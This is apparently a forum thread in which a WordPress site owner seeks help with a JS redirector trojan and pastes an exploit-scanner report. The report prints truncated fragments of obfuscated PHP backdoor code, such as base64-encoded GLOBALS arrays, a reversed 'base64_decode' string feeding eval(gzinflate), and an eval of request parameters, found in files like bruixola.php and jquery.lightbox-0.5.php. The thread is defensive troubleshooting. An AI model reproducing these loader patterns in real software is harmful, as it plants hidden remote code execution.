Hello, yes this is I have a trojan on my site hxxp://www.actuafoot.fr/ but could not find the script I looked around plugins, themes, etc …

That’s the title of the trojan: JS: Redirector-NV [Trj]

Here is a description of what I subject is infected with <http://www.viruslist.com
/ ru / search? Trojan.JS.Redirector.ue VN => Trojan.JS.Redirector.ue

There’s me that Avast detects this Trojan I looked around the files I find nothing

Thank you for helping me it’s been quite a day I lose visitors

Hi Actuafoot,

The issue is with: Wordpress internal path: /homepages/45/d345406617/htdocs/actuafoot/wp-content/themes/actuafoot/index.php
and the plug-in code, scanning this is flagged as being suspicious: wXw.actuafoot.fr/tag/ziani suspicious
[suspicious:2] (ipaddr:82.165.56.93) (jsvar) wXw.actuafoot.fr/tag/ziani
Download Wordpress exploit scanner from here: http://downloads.wordpress.org/plugin/exploit-scanner.1.2.zip
do a scan with it and report what you have found,

polonus

Hi Actuafoot,

You also have to consider this redirect from your site to: hxxp://mediacdn.disqus.com/1328833754/build/system/count.js
See: http://www.google.com/safebrowsing/diagnostic?site=mediacdn.disqus.com (site has been infecting domains)

polonus

I am also infected with Disqus plugin?

I installed Exploit Scanner analysis put how long? I started it’s been ten minutes

I check if Disqus is infected?

Here is the report :

wp-includes/functions.php:190
Often used to execute malicious code if ( doubleval($bytes) >= $mag )
wp-includes/js/jquery/bruixola.php:1
Used by malicious scripts to decode previously obscured data/programs <? $GLOBALS['_401682669_']=Array(base64_decode('' .'Z' .'XJyb3JfcmVwb3J0aW' .'5n'),base64_decode('cHJlZ19' .'tY' .'XR' .'jaA=='),ba [line truncated] wp-includes/js/tinymce/plugins/wpfullscreen/validator.php:1 Often used to execute malicious code oKvJWvKjg","wYKvee6QFdb85JA1M3SQ","2a39D4S1VAA=");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x wp-content/plugins/wp-uber-menu/js/colorpicker/js/jquery.js:552 Often used to execute malicious code jQuery.globalEval( elem.text || elem.textContent || elem.innerHTM wp-content/plugins/wp-uber-menu/js/colorpicker/js/jquery.js:3721 Often used to execute malicious code jQuery.globalEval( data ); wp-content/plugins/wp-uber-menu/styles/jquery.lightbox-0.5.php:1 Often used to execute malicious code rrev('edoced_46esab');$hgdv = strrev('etalfnizg');eval($hgdv($j_pg(implode('',$rwl)))); ?>
wp-content/plugins/disqus-comment-system/lib/api/disqus/json.php:258
Often used to execute malicious code return eval(‘return "’.str_replace(‘"’,‘"’,$buf).‘";’);
wp-content/plugins/contact-form-7/jquery.form.js:613
Often used to execute malicious code $.globalEval(data);
wp-content/plugins/contact-form-7/scripts.js:49
Often used to execute malicious code $.each(data.onSentOk, function(i, n) { eval(n) });
wp-content/plugins/contact-form-7/scripts.js:55
Often used to execute malicious code $.each(data.onSubmit, function(i, n) { eval(n) });
wp-content/plugins/more-fields/more-fields-field-types.php:358
Often used to execute malicious code var json = eval("(" + response + ")");
wp-content/plugins/more-fields/more-fields-field-types.php:396
Often used to execute malicious code var json = eval("(" + response + ")");
wp-content/plugins/wp-super-cache/wp-cache.php:2033
Used by malicious scripts to decode previously obscured data/programs replace( ‘…’, ‘’, preg_replace(“/(?.)?$/“, ‘’, base64_decode( $_GET[ ‘uri’ ] ) ) ) ) );
wp-content/plugins/wp-super-cache/wp-cache.php:2040
Used by malicious scripts to decode previously obscured data/programs replace( ‘…’, ‘’, preg_replace(”/(?.)?$/”, ‘’, base64_decode( $_GET[ ‘uri’ ] ) ) ) ) );
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:211

following :
Often used to execute malicious code eval( ‘?>’ . $cachefiledata . ‘<?php ' ); wp-content/plugins/wp-super-cache/wp-cache-phase1.php:216 Often used to execute malicious code eval( '?>’ . $cachefiledata . ‘<?php ' ); wp-content/plugins/wp-super-cache/wp-cache-phase1.php:252 Often used to execute malicious code eval( '?>’ . $cache . ‘<?php ' ); wp-content/plugins/wp-super-cache/wp-cache-phase1.php:269 Often used to execute malicious code eval( '?>’ . $uncompressed . ‘<?php ' ); wp-content/plugins/wp-super-cache/wp-cache-phase1.php:271 Often used to execute malicious code eval( '?>’ . $cache . ‘<?php ’ );
wp-content/plugins/wp-super-cache/Changelog.txt:1892
Often used to execute malicious code eval() and html.
wp-content/plugins/network-publisher/JSON.php:22
Often used to execute malicious code * Javascript, and can be directly eval()‘ed with no further parsing
wp-content/plugins/bitdefender-antispam-for-wordpress/img.php:5
Used by malicious scripts to decode previously obscured data/programs echo base64_decode(“R0lGODlhAQABALMAAP8p9/////////////////////////
wp-content/themes/actuafoot/header.php:86
Often used to execute malicious code eval(cadre+”.location=’“+selection.options[selection
wp-content/themes/actuafoot/scripts/js/jquery-ui.min.js:273
Often used to execute malicious code s=inlineSettings||{};try{inlineSettings[attrName]=eval(attrValue);}catch(err){inlineSettings[attrName]
wp-content/themes/actuafoot/scripts/js/jquery.min.js:12
Often used to execute malicious code .src,async:false,dataType:“script”})}else{o.globalEval(F.text||F.textContent||F.innerHTML||”“)}if(F.pa
wp-content/themes/actuafoot/scripts/js/jquery.min.js:19
Often used to execute malicious code )}if(typeof I===“string”){if(H==“script”){o.globalEval(I)}if(H==“json”){I=l"eval"}}return
stats/admin/scripts/jquery-plugin.js:2080
Often used to execute malicious code eval($this.onActions[“onOpen”])($this);
stats/admin/scripts/jquery-plugin.js:2097
Often used to execute malicious code eval($this.onActions[“onClose”])($this);
stats/admin/scripts/jquery-plugin.js:2283
Often used to execute malicious code eval($this.onActions[nm])($this);
stats/admin/scripts/jquery-plugin.js:2298
Often used to execute malicious code eval(options.onInit)($this);
stats/admin/scripts/jquery-plugin.min.js:1
Often used to execute malicious code t”,function(){if($this.onActions[“onOpen”]!=null){eval($this.onActions[“onOpen”])($this)}});if(childid!=msOldDiv){msOldDiv=childid}}};this.clos [line truncated]
stats/admin/scripts/json.php:22
Often used to execute malicious code * Javascript, and can be directly eval()‘ed with no further parsing
stats/images/clubs/wbuid.php:1
Used by malicious scripts to decode previously obscured data/programs <? $GLOBALS[‘401682669’]=Array(base64_decode(’’ .‘Z’ .‘XJyb3JfcmVwb3J0aW’ .‘5n’),base64_decode(‘cHJlZ19’ .‘tY’ .‘XR’ .‘jaA==’),ba [line truncated]
stats/prono/pronos.php:23
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_0.src = ImgN.src’)
stats/prono/pronos.php:24
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_1.src = Img1R.src’
stats/prono/pronos.php:25
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_2.src = Img2.src’)
stats/prono/pronos.php:26
Often used to execute malicious code eval(‘PL[’+match+‘]=Ch1;’);
stats/prono/pronos.php:28
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_0.src = ImgN.src’)
stats/prono/pronos.php:29
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_1.src = Img1.src’)
stats/prono/pronos.php:30
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_2.src = Img2R.src’
stats/prono/pronos.php:31
Often used to execute malicious code eval(‘PL[’+match+‘]=Ch2;’);
stats/prono/pronos.php:33
Often used to execute malicious code eval(‘document.matchid.m’+match+‘0.src = ImgNR.src’
stats/prono/pronos.php:34
Often used to execute malicious code eval(‘document.matchid.m’+match+‘1.src = Img1.src’)
stats/prono/pronos.php:35
Often used to execute malicious code eval(‘document.matchid.m’+match+‘2.src = Img2.src’)
stats/prono/pronos.php:36
Often used to execute malicious code eval(‘PL[’+match+‘]=ChN;’);
stats/prono/pronos.php:52
Often used to execute malicious code eval('document.matchid.r’+i+‘.value=PL[’+i+‘];’);
stats/prono/pronos.php:54
Often used to execute malicious code else { eval('document.matchid.r’+i+‘.value=undefined;’); }
stats/prono/pronos.php:56
Often used to execute malicious code else { eval('document.matchid.r’+i+‘.value=undefined;’); }
stats/scripts/jquery-1.4.4.min.js:20
Often used to execute malicious code url:b.src,async:false,dataType:“script”}):c.globalEval(b.text||b.textContent||b.innerHTML||“”);b.paren
stats/scripts/jquery-1.4.4.min.js:144
Often used to execute malicious code =“script”||!b&&e.indexOf(“javascript”)>=0)c.globalEval(a);return a}});
stats/scripts/jquery-ui-1.8.6.custom.min.js:1
Often used to execute malicious code =a.getAttribute(“date:”+e);if(f){c=c||{};try{c[e]=eval(f)}catch(h){c[e]=f}}}e=a.nodeName.toLowerCase()
d23f3b6aad511d38269d66625f66f77848dce7d7.php:280

Folowing :
Used by malicious scripts to decode previously obscured data/programs return rsa_verify($message, base64_decode($signature), $public_key, $modulus, $keylength)
d23f3b6aad511d38269d66625f66f77848dce7d7.php:288
Used by malicious scripts to decode previously obscured data/programs return rsa_decrypt(base64_decode($message), $private_key, $modulus, $keylength);
d23f3b6aad511d38269d66625f66f77848dce7d7.php:317
Used by malicious scripts to decode previously obscured data/programs $enc_text = base64_decode($enc_text);
d23f3b6aad511d38269d66625f66f77848dce7d7.php:354
Often used to execute malicious code $success = @eval(‘?>’.$request->params);
Level Warning (45 matches)
Location / Description What was matched
wp-config-sample.php
Modified core file See what has been modified
wp-load.php
Modified core file See what has been modified
wp-admin/setup-config.php
Modified core file See what has been modified
wp-includes/functions.php
Modified core file See what has been modified
wp-includes/load.php
Modified core file See what has been modified
wp-includes/ms-load.php
Modified core file See what has been modified
wp-includes/ms-settings.php
Modified core file See what has been modified
wp-includes/version.php
Modified core file See what has been modified
wp-includes/wp-db.php
Modified core file See what has been modified
wp-includes/images/crystal/license.txt
Modified core file See what has been modified
wp-includes/js/scriptaculous/MIT-LICENSE
Modified core file See what has been modified
wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css
Modified core file See what has been modified
license.txt
Modified core file See what has been modified
readme.html
Modified core file See what has been modified
wp-includes/js/jquery/getquote.php:7
The e modifier in preg_replace can be used to execute malicious code
wp-content/plugins/wp-uber-menu/js/jpicker/jpicker-1.1.5.min.js:1
iframes are sometimes used to load unwanted adverts and code on your site el){return}var aA=R.find(“table:first”);R.before(“

Going to the site I do not experience any avast shield alert,

polonus